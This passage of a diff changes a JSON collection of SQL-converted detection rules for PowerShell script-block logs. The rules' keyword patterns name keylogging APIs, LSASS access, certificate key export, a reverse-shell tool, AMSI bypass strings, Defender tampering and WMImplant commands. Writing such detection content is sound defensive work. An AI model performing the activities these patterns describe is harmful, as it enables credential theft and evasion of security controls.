+ "title": "Enable Windows Remote Management", + "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "status": "test", - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "author": "frack113", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Unknown" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "title": "Powershell MsXml COM Object", + "id": "78aa1347-1517-4454-9982-b338d6df8343", "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113, MatilJ", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_msxml_com.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "App-V clients" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", @@ -6775,48 +6661,67 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + ], + "filename": "posh_ps_psasyncshell.yml" + }, + { + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { "title": "Malicious ShellIntel PowerShell Commandlets", @@ -6838,193 +6743,196 @@ "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "author": "frack113", + "title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "status": "experimental", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1059.001", + "attack.t1106" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.collection", + "attack.t1114.001" ], "falsepositives": [ - "Legitimate administration scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Powershell MsXml COM Object", - "id": "78aa1347-1517-4454-9982-b338d6df8343", + "title": "Import PowerShell Modules From Suspicious Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113, MatilJ", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_msxml_com.yml" + "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.exfiltration", + "attack.t1020" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_upload.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Administrative scripts that use the same keywords." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' 